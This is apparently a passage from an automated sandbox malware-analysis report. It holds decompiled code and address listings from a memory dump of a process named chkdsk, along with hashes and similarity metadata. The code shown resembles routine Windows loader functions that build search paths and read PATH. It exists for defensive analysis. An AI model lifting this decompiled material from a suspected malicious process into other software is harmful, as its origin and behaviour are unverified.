															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                                      0x04d9d5f2
                                                      0x04d9d5f5
                                                      0x04d9d5f5
                                                      0x04d9d5fd
                                                      0x04d9d600
                                                      0x04d9d60a
                                                      0x04d9d60d
                                                      0x04d9d617
                                                      0x04d9d61d
                                                      0x04d9d627
                                                      0x04d9d62e
                                                      0x04d9d911
                                                      0x04d9d913
                                                      0x00000000
                                                      0x04d9d919
                                                      0x04d9d919
                                                      0x04d9d919
                                                      0x04d9d634
                                                      0x04d9d634
                                                      0x04d9d634
                                                      0x04d9d634
                                                      0x04d9d640
                                                      0x04d9d8bf
                                                      0x00000000
                                                      0x04d9d646
                                                      0x04d9d646
                                                      0x04d9d64d
                                                      0x04d9d652
                                                      0x04deb2fc
                                                      0x04deb2fc
                                                      0x04deb302
                                                      0x04deb33b
                                                      0x04deb341
                                                      0x00000000
                                                      0x04deb304
                                                      0x04deb304
                                                      0x04deb319
                                                      0x04deb31e
                                                      0x04deb324
                                                      0x04deb326
                                                      0x04deb332
                                                      0x04deb347
                                                      0x04deb34c
                                                      0x04deb351
                                                      0x04deb35a
                                                      0x00000000
                                                      0x04deb328
                                                      0x04deb328
                                                      0x00000000
                                                      0x04deb328
                                                      0x04deb326
                                                      0x04d9d658
                                                      0x04d9d658
                                                      0x04d9d65b
                                                      0x04d9d665
                                                      0x00000000
                                                      0x04d9d66b
                                                      0x04d9d66b
                                                      0x04d9d66b
                                                      0x04d9d66b
                                                      0x04d9d66d
                                                      0x04d9d672
                                                      0x04d9d67a
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9d680
                                                      0x04d9d686
                                                      0x04d9d8ce
                                                      0x04d9d8d4
                                                      0x04d9d8da
                                                      0x04d9d8dd
                                                      0x04d9d8dd
                                                      0x04d9d8e0
                                                      0x04d9d68c
                                                      0x04d9d691
                                                      0x04d9d69d
                                                      0x04d9d6a2
                                                      0x04d9d6a7
                                                      0x04d9d6b0
                                                      0x04d9d6b0
                                                      0x04d9d6b5
                                                      0x04d9d6e0
                                                      0x04d9d6b7
                                                      0x04d9d6b7
                                                      0x04d9d6b9
                                                      0x04d9d6b9
                                                      0x04d9d6bb
                                                      0x04d9d6bd
                                                      0x04d9d6ce
                                                      0x04d9d6d0
                                                      0x04d9d6d2
                                                      0x04deb363
                                                      0x04deb365
                                                      0x00000000
                                                      0x04deb36b
                                                      0x00000000
                                                      0x04deb36b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9d6bf
                                                      0x04d9d6bf
                                                      0x04d9d6e5
                                                      0x04d9d6e7
                                                      0x04d9d6e9
                                                      0x04d9d6e9
                                                      0x04d9d6ec
                                                      0x04d9d6ec
                                                      0x04d9d6ef
                                                      0x04d9d6f5
                                                      0x04d9d6f9
                                                      0x04d9d6fb
                                                      0x04d9d6fd
                                                      0x04d9d701
                                                      0x04d9d703
                                                      0x04d9d70a
                                                      0x04d9d70a
                                                      0x04d9d70a
                                                      0x04d9d701
                                                      0x04d9d70d
                                                      0x04d9d710
                                                      0x04d9d710
                                                      0x04d9d6c1
                                                      0x04d9d6c1
                                                      0x04d9d6c1
                                                      0x04d9d6c6
                                                      0x04deb36d
                                                      0x04deb36f
                                                      0x00000000
                                                      0x04deb375
                                                      0x04deb375
                                                      0x04deb375
                                                      0x00000000
                                                      0x04deb375
                                                      0x00000000
                                                      0x04d9d6cc
                                                      0x04d9d6d8
                                                      0x04d9d6d8
                                                      0x04d9d6d8
                                                      0x00000000
                                                      0x04d9d6c6
                                                      0x04d9d6bf
                                                      0x00000000
                                                      0x04d9d6da
                                                      0x04d9d6da
                                                      0x04d9d716
                                                      0x04d9d71b
                                                      0x04d9d720
                                                      0x04d9d726
                                                      0x04d9d726
                                                      0x04d9d72d
                                                      0x00000000
                                                      0x04d9d733
                                                      0x04d9d739
                                                      0x04d9d742
                                                      0x04d9d750
                                                      0x04d9d758
                                                      0x04d9d764
                                                      0x04d9d776
                                                      0x04d9d77a
                                                      0x04d9d783
                                                      0x04d9d928
                                                      0x04d9d92c
                                                      0x04d9d93d
                                                      0x04d9d944
                                                      0x04d9d94f
                                                      0x04d9d954
                                                      0x04d9d956
                                                      0x04d9d95f
                                                      0x04d9d961
                                                      0x04d9d973
                                                      0x04d9d973
                                                      0x04d9d956
                                                      0x04d9d944
                                                      0x04d9d92c
                                                      0x04d9d78b
                                                      0x04deb394
                                                      0x04d9d791
                                                      0x04d9d798
                                                      0x04deb3a3
                                                      0x04deb3bb
                                                      0x04deb3bb
                                                      0x04d9d7a5
                                                      0x04d9d866
                                                      0x04d9d870
                                                      0x04d9d884
                                                      0x04d9d892
                                                      0x04d9d898
                                                      0x04d9d89e
                                                      0x04d9d8a0
                                                      0x04d9d8a6
                                                      0x04d9d8ac
                                                      0x04d9d8ae
                                                      0x04d9d8b4
                                                      0x04d9d8b4
                                                      0x04d9d8ae
                                                      0x04d9d7a5
                                                      0x04d9d78b
                                                      0x04d9d7b1
                                                      0x04deb3c5
                                                      0x04deb3c5
                                                      0x04d9d7c3
                                                      0x04d9d7ca
                                                      0x04d9d7e5
                                                      0x04d9d7eb
                                                      0x04d9d8eb
                                                      0x04d9d8ed
                                                      0x00000000
                                                      0x04d9d8f3
                                                      0x04d9d8f3
                                                      0x04d9d8f3
                                                      0x00000000
                                                      0x04d9d8ed
                                                      0x04d9d7cc
                                                      0x04d9d7cc
                                                      0x04d9d7d2
                                                      0x00000000
                                                      0x04d9d7d4
                                                      0x04d9d7d4
                                                      0x04d9d7d7
                                                      0x04d9d7df
                                                      0x04deb3d4
                                                      0x04deb3d9
                                                      0x04deb3dc
                                                      0x04deb3dc
                                                      0x04deb3df
                                                      0x04deb3e2
                                                      0x04deb468
                                                      0x04deb46d
                                                      0x04deb46f
                                                      0x04deb46f
                                                      0x04deb475
                                                      0x04d9d8f8
                                                      0x04d9d8f9
                                                      0x04d9d8fd
                                                      0x04deb3e8
                                                      0x04deb3e8
                                                      0x04deb3eb
                                                      0x04deb3ed
                                                      0x00000000
                                                      0x04deb3ef
                                                      0x04deb3ef
                                                      0x04deb3f1
                                                      0x04deb3f4
                                                      0x04deb3fe
                                                      0x04deb404
                                                      0x04deb409
                                                      0x04deb40e
                                                      0x04deb410
                                                      0x04deb410
                                                      0x04deb414
                                                      0x04deb414
                                                      0x04deb41b
                                                      0x04deb420
                                                      0x04deb423
                                                      0x04deb425
                                                      0x04deb427
                                                      0x04deb42a
                                                      0x04deb42d
                                                      0x04deb42d
                                                      0x04deb42a
                                                      0x04deb432
                                                      0x04deb436
                                                      0x04deb438
                                                      0x04deb43b
                                                      0x04deb43b
                                                      0x04deb449
                                                      0x04deb44e
                                                      0x04deb454
                                                      0x04deb458
                                                      0x04deb458
                                                      0x04deb45d
                                                      0x00000000
                                                      0x04deb45d
                                                      0x04deb3ed
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9d7df
                                                      0x04d9d7d2
                                                      0x04d9d7ca
                                                      0x04deb37c
                                                      0x04deb37e
                                                      0x04deb385
                                                      0x04deb38a
                                                      0x00000000
                                                      0x04deb38a
                                                      0x04d9d742
                                                      0x04d9d7f1
                                                      0x04d9d7f8
                                                      0x04deb49b
                                                      0x04deb49b
                                                      0x04d9d800
                                                      0x04d9d837
                                                      0x04d9d843
                                                      0x04d9d845
                                                      0x04d9d847
                                                      0x04d9d84a
                                                      0x04d9d84b
                                                      0x04d9d84e
                                                      0x04d9d857
                                                      0x04d9d802
                                                      0x04d9d802
                                                      0x04d9d80d
                                                      0x00000000
                                                      0x04d9d818
                                                      0x04d9d818
                                                      0x04d9d824
                                                      0x04d9d831
                                                      0x04deb4a5
                                                      0x04deb4ab
                                                      0x04deb4b3
                                                      0x04deb4b8
                                                      0x04deb4bb
                                                      0x00000000
                                                      0x04deb4c1
                                                      0x04deb4c1
                                                      0x04deb4c8
                                                      0x00000000
                                                      0x04deb4ce
                                                      0x04deb4d4
                                                      0x04deb4e1
                                                      0x04deb4e3
                                                      0x04deb4e5
                                                      0x00000000
                                                      0x04deb4eb
                                                      0x04deb4f0
                                                      0x04deb4f2
                                                      0x04d9dac9
                                                      0x04d9dacc
                                                      0x04d9dacf
                                                      0x04d9dad1
                                                      0x04d9dd78
                                                      0x04d9dd78
                                                      0x04d9dcf2
                                                      0x00000000
                                                      0x04d9dad7
                                                      0x04d9dad9
                                                      0x04d9dadb
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9dae1
                                                      0x04d9dae1
                                                      0x04d9dae4
                                                      0x04d9dae6
                                                      0x04deb4f9
                                                      0x04deb4f9
                                                      0x04deb500
                                                      0x04d9daec
                                                      0x04d9daec
                                                      0x04d9daf5
                                                      0x04d9daf8
                                                      0x04d9dafb
                                                      0x04d9db03
                                                      0x04d9db11
                                                      0x04d9db16
                                                      0x04d9db19
                                                      0x04d9db1b
                                                      0x04deb52c
                                                      0x04deb531
                                                      0x04deb534
                                                      0x04d9db21
                                                      0x04d9db21
                                                      0x04d9db24
                                                      0x04d9dcd9
                                                      0x04d9dce2
                                                      0x04d9dce5
                                                      0x04d9dd6a
                                                      0x04d9dd6d
                                                      0x00000000
                                                      0x04d9dd73
                                                      0x04deb51a
                                                      0x04deb51c
                                                      0x04deb51f
                                                      0x04deb524
                                                      0x00000000
                                                      0x04deb524
                                                      0x04d9dce7
                                                      0x04d9dce7
                                                      0x04d9dce7
                                                      0x00000000
                                                      0x04d9dce7
                                                      0x00000000
                                                      0x04d9db2a
                                                      0x04d9db2c
                                                      0x04d9db31
                                                      0x04d9db33
                                                      0x04d9db36
                                                      0x04d9db39
                                                      0x04d9db3b
                                                      0x04d9db66
                                                      0x04d9db66
                                                      0x04d9db3d
                                                      0x04d9db3d
                                                      0x04d9db3e
                                                      0x04d9db46
                                                      0x04d9db47
                                                      0x04d9db49
                                                      0x04d9db4c
                                                      0x04d9db53
                                                      0x04d9db55
                                                      0x04d9db58
                                                      0x04d9db5a
                                                      0x04deb50a
                                                      0x04deb50f
                                                      0x04deb512
                                                      0x04d9db60
                                                      0x04d9db60
                                                      0x04d9db63
                                                      0x04d9db63
                                                      0x00000000
                                                      0x04d9db63
                                                      0x04d9db5a
                                                      0x04d9db3b
                                                      0x04d9db24
                                                      0x04d9db69
                                                      0x04d9db69
                                                      0x04d9db6c
                                                      0x04d9db6f
                                                      0x04d9db74
                                                      0x04deb557
                                                      0x04deb557
                                                      0x04deb55e
                                                      0x04d9db7a
                                                      0x04d9db7c
                                                      0x04d9db7f
                                                      0x04d9db82
                                                      0x04d9db85
                                                      0x00000000
                                                      0x04d9db8b
                                                      0x04d9db8b
                                                      0x04d9db8d
                                                      0x04d9db9b
                                                      0x04d9db9b
                                                      0x04d9db9d
                                                      0x04d9dba0
                                                      0x04d9dba2
                                                      0x04d9dba4
                                                      0x04d9dba7
                                                      0x04d9dba9
                                                      0x04d9dbae
                                                      0x04d9dbae
                                                      0x04d9dbb1
                                                      0x04d9dbb4
                                                      0x04d9dbb4
                                                      0x04d9dbb7
                                                      0x04d9dbba
                                                      0x04d9dcd2
                                                      0x04d9dcd4
                                                      0x00000000
                                                      0x04d9dbc0
                                                      0x04d9dbc0
                                                      0x04d9dbd2
                                                      0x04d9dbd7
                                                      0x04d9dbda
                                                      0x04d9dbdd
                                                      0x04d9dbdf
                                                      0x00000000
                                                      0x04d9dbe5
                                                      0x04d9dbe5
                                                      0x04d9dbee
                                                      0x04d9dbf1
                                                      0x04deb541
                                                      0x04deb544
                                                      0x00000000
                                                      0x04deb546
                                                      0x04deb546
                                                      0x00000000
                                                      0x04deb546
                                                      0x04d9dbf7
                                                      0x04d9dbf7
                                                      0x04d9dbfd
                                                      0x04d9dbfd
                                                      0x04d9dbff
                                                      0x04d9dc0b
                                                      0x04d9dc15
                                                      0x04d9dc1b
                                                      0x04d9dc1d
                                                      0x04d9dc21
                                                      0x04d9dc21
                                                      0x04d9dc23
                                                      0x04d9dc23
                                                      0x04d9dc26
                                                      0x04d9dc29
                                                      0x04d9dc2b
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9dc31
                                                      0x04d9dc34
                                                      0x04d9dc36
                                                      0x04d9dcbf
                                                      0x04d9dcbf
                                                      0x04d9dcc2
                                                      0x00000000
                                                      0x04d9dc3c
                                                      0x04d9dc41
                                                      0x04d9dc43
                                                      0x00000000
                                                      0x04d9dc45
                                                      0x04d9dc45
                                                      0x04d9dc47
                                                      0x00000000
                                                      0x04d9dc4d
                                                      0x04d9dc4d
                                                      0x04d9dc50
                                                      0x04d9dc52
                                                      0x04d9dc55
                                                      0x04d9dcfa
                                                      0x04d9dcfe
                                                      0x04d9dd08
                                                      0x04d9dd0a
                                                      0x04d9dd0c
                                                      0x00000000
                                                      0x04d9dd12
                                                      0x04d9dd15
                                                      0x04d9dd2d
                                                      0x04d9dd2f
                                                      0x04d9dd32
                                                      0x04d9dd35
                                                      0x00000000
                                                      0x04d9dd35
                                                      0x04d9dc5b
                                                      0x04d9dc5b
                                                      0x04d9dc5e
                                                      0x04d9dc61
                                                      0x04d9dc64
                                                      0x04d9dc67
                                                      0x04d9dc67
                                                      0x04d9dc6a
                                                      0x04d9dc6c
                                                      0x04d9dc8e
                                                      0x04d9dc8e
                                                      0x04d9dc91
                                                      0x04d9dc93
                                                      0x04d9dcce
                                                      0x04d9dcce
                                                      0x04d9dc95
                                                      0x04d9dc9c
                                                      0x04d9dc6e
                                                      0x04d9dc72
                                                      0x04d9dc75
                                                      0x04d9dc77
                                                      0x04d9dc79
                                                      0x04deb551
                                                      0x04deb551
                                                      0x00000000
                                                      0x04d9dc7f
                                                      0x04d9dc7f
                                                      0x04d9dc81
                                                      0x00000000
                                                      0x04d9dc83
                                                      0x04d9dc86
                                                      0x04d9dc88
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9dc88
                                                      0x04d9dc81
                                                      0x04d9dc79
                                                      0x04d9dc6c
                                                      0x04d9dc55
                                                      0x04d9dc47
                                                      0x04d9dc43
                                                      0x00000000
                                                      0x04d9dc36
                                                      0x04d9dc23
                                                      0x00000000
                                                      0x04d9dbff
                                                      0x04d9dbf1
                                                      0x04d9dbdf
                                                      0x04d9db8f
                                                      0x04d9db92
                                                      0x04d9db95
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9db95
                                                      0x04d9db8d
                                                      0x04d9db85
                                                      0x04d9db74
                                                      0x04d9dc9f
                                                      0x04d9dca2
                                                      0x04d9dcb0
                                                      0x04d9dcb0
                                                      0x04d9dad1
                                                      0x04deb4e5
                                                      0x04deb4c8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9d831
                                                      0x04d9d80d
                                                      0x00000000
                                                      0x04d9d800
                                                      0x04deb47f
                                                      0x04deb485
                                                      0x00000000
                                                      0x04deb485
                                                      0x04d9d665
                                                      0x04d9d652
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )0
                                                      • API String ID: 0-2259565531
                                                      • Opcode ID: ab34769514df47ba4c4a3e569e593b419e3cb8e4614fa2bf706d0f6943d457b5
                                                      • Instruction ID: a03b4e3b1129ac849a33fb86e3f6f240fd1d32dcea8c073cb82bf6876c52fad0
                                                      • Opcode Fuzzy Hash: ab34769514df47ba4c4a3e569e593b419e3cb8e4614fa2bf706d0f6943d457b5
                                                      • Instruction Fuzzy Hash: B9E19D30B012598FEF25DF29C984BB9B7F2BF45318F04419AD94A97291E734BD81CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DB2581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 81%
                                                      			E04DB2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t225;
				signed int _t229;
				signed int _t240;
				signed int _t242;
				intOrPtr _t244;
				signed int _t247;
				signed int _t254;
				signed int _t257;
				signed int _t265;
				intOrPtr _t271;
				signed int _t273;
				signed int _t275;
				signed int _t287;
				unsigned int _t290;
				signed int _t294;
				signed int _t296;
				signed int _t300;
				intOrPtr _t312;
				signed int _t321;
				signed int _t323;
				signed int _t324;
				signed int _t328;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				void* _t336;
				void* _t338;
				void* _t339;

				_t333 = _t335;
				_t336 = _t335 - 0x4c;
				_v8 =  *0x4e7d360 ^ _t333;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t328 = 0x4e7b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t290 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t339 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t271 = 0x48;
				_t310 = 0 | _t339 == 0x00000000;
				_t321 = 0;
				_v37 = _t339 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t271 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t329 = 0xc0000106;
						goto L32;
					} else {
						_t328 = L04DA4620(_t290,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t271);
						_v52 = _t328;
						__eflags = _t328;
						if(_t328 == 0) {
							_t329 = 0xc0000017;
							goto L32;
						} else {
							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
							_t50 = _t328 + 0x48; // 0x48
							_t323 = _t50;
							_t310 = _v32;
							 *((intOrPtr*)(_t328 + 0x3c)) = _t271;
							_t273 = 0;
							 *((short*)(_t328 + 0x30)) = _v48;
							__eflags = _t310;
							if(_t310 != 0) {
								 *(_t328 + 0x18) = _t323;
								__eflags = _t310 - 0x4e78478;
								 *_t328 = ((0 | _t310 == 0x04e78478) - 0x00000001 & 0xfffffffb) + 7;
								E04DCF3E0(_t323,  *((intOrPtr*)(_t310 + 4)),  *_t310 & 0x0000ffff);
								_t310 = _v32;
								_t336 = _t336 + 0xc;
								_t273 = 1;
								__eflags = _a8;
								_t323 = _t323 + (( *_t310 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t265 = E04E139F2(_t323);
									_t310 = _v32;
									_t323 = _t265;
								}
							}
							_t294 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t329 = _v68;
								__eflags = 0;
								 *((short*)(_t323 - 2)) = 0;
								goto L32;
							} else {
								_t275 = _t328 + _t273 * 4;
								_v56 = _t275;
								do {
									__eflags = _t310;
									if(_t310 != 0) {
										_t225 =  *(_v60 + _t294 * 4);
										__eflags = _t225;
										if(_t225 == 0) {
											goto L30;
										} else {
											__eflags = _t225 == 5;
											if(_t225 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t275 =  *(_v60 + _t294 * 4);
										 *(_t275 + 0x18) = _t323;
										_t229 =  *(_v60 + _t294 * 4);
										__eflags = _t229 - 8;
										if(_t229 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t229 * 4 +  &M04DB2959))) {
												case 0:
													__ax =  *0x4e78488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E04DCF3E0(__edi,  *0x4e7848c, __ax & 0x0000ffff);
														__eax =  *0x4e78488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E04DCF3E0(_t323, _v80, _v64);
													_t260 = _v64;
													goto L26;
												case 2:
													 *0x4e78480 & 0x0000ffff = E04DCF3E0(__edi,  *0x4e78484,  *0x4e78480 & 0x0000ffff);
													__eax =  *0x4e78480 & 0x0000ffff;
													__eax = ( *0x4e78480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E04DCF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E04DCF3E0(_t323, _v76, _v36);
														_t260 = _v36;
													}
													L26:
													_t336 = _t336 + 0xc;
													_t323 = _t323 + (_t260 >> 1) * 2 + 2;
													__eflags = _t323;
													L27:
													_push(0x3b);
													_pop(_t262);
													 *((short*)(_t323 - 2)) = _t262;
													goto L28;
												case 6:
													__ebx = "\\Wow\\Wow";
													__eflags = __ebx - "\\Wow\\Wow";
													if(__ebx != "\\Wow\\Wow") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E04DCF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\Wow\\Wow";
														} while (__ebx != "\\Wow\\Wow");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x4e78478 & 0x0000ffff = E04DCF3E0(__edi,  *0x4e7847c,  *0x4e78478 & 0x0000ffff);
													__eax =  *0x4e78478 & 0x0000ffff;
													__eax = ( *0x4e78478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E04E139F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x4e76e58 & 0x0000ffff = E04DCF3E0(__edi,  *0x4e76e5c,  *0x4e76e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x4e76e58 & 0x0000ffff;
													__eax = ( *0x4e76e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t294 = _v16;
													_t310 = _v32;
													L29:
													_t275 = _t275 + 4;
													__eflags = _t275;
													_v56 = _t275;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t294 = _t294 + 1;
									_v16 = _t294;
									__eflags = _t294 - _v48;
								} while (_t294 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t229 =  *(_v60 + _t321 * 4);
						if(_t229 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t229 * 4 +  &M04DB2935))) {
							case 0:
								__ax =  *0x4e78488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t310 =  &_v64;
								_v80 = E04DB2E3E(0,  &_v64);
								_t271 = _t271 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x4e78480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4e78480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E04D9EEF0(0x4e779a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E04D9EB70(__ecx, 0x4e779a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t203 = _v72;
											__eflags = _t203;
											if(_t203 != 0) {
												L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t203);
											}
											_t204 = _v52;
											__eflags = _t204;
											if(_t204 != 0) {
												__eflags = _t329;
												if(_t329 < 0) {
													L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t204);
													_t204 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t290 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x4e77b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E04D9EB70(__ecx, 0x4e779a0);
										__eax = _v52;
										L36:
										_pop(_t322);
										_pop(_t330);
										__eflags = _v8 ^ _t333;
										_pop(_t272);
										return E04DCB640(_t204, _t272, _v8 ^ _t333, _t310, _t322, _t330);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t267 = _v56;
								if(_v56 != 0) {
									_t310 =  &_v36;
									_t269 = E04DB2E3E(_t267,  &_v36);
									_t290 = _v36;
									_v76 = _t269;
								}
								if(_t290 == 0) {
									goto L44;
								} else {
									_t271 = _t271 + 2 + _t290;
								}
								goto L14;
							case 6:
								__eax =  *0x4e75764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x4e78478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4e78478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x4e76e58 & 0x0000ffff;
								__eax = ( *0x4e76e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t321 = _t321 + 1;
								if(_t321 >= _v48) {
									goto L16;
								} else {
									_t310 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("fild dword [esi]");
					asm("daa");
					asm("fild dword [esi+ebp]");
					asm("fild dword [es:esi+eax*2]");
					asm("fild dword [es:edi+ebx]");
					asm("fild word [esp+edx*4]");
					asm("fild word [edx+eax]");
					asm("daa");
					asm("fild dword [esi+ebx]");
					asm("daa");
					asm("fild dword [eax+ebx*8]");
					asm("fild word [esp+esi*4]");
					_t338 = 0x25;
					asm("fild word [esp+ecx*8]");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x4e5ff00);
					E04DDD08C(0, _t323, _t328);
					_v44 =  *[fs:0x18];
					_t324 = 0;
					 *_a24 = 0;
					_t287 = _a12;
					__eflags = _t287;
					if(_t287 == 0) {
						_t240 = 0xc0000100;
					} else {
						_v8 = 0;
						_t331 = 0xc0000100;
						_v52 = 0xc0000100;
						_t242 = 4;
						while(1) {
							_v40 = _t242;
							__eflags = _t242;
							if(_t242 == 0) {
								break;
							}
							_t300 = _t242 * 0xc;
							_v48 = _t300;
							__eflags = _t287 -  *((intOrPtr*)(_t300 + 0x4d61664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t257 = E04DCE5C0(_a8,  *((intOrPtr*)(_t300 + 0x4d61668)), _t287);
									_t338 = _t338 + 0xc;
									__eflags = _t257;
									if(__eflags == 0) {
										_t331 = E04E051BE(_t287,  *((intOrPtr*)(_v48 + 0x4d6166c)), _a16, _t324, _t331, __eflags, _a20, _a24);
										_v52 = _t331;
										break;
									} else {
										_t242 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t242 = _t242 - 1;
									continue;
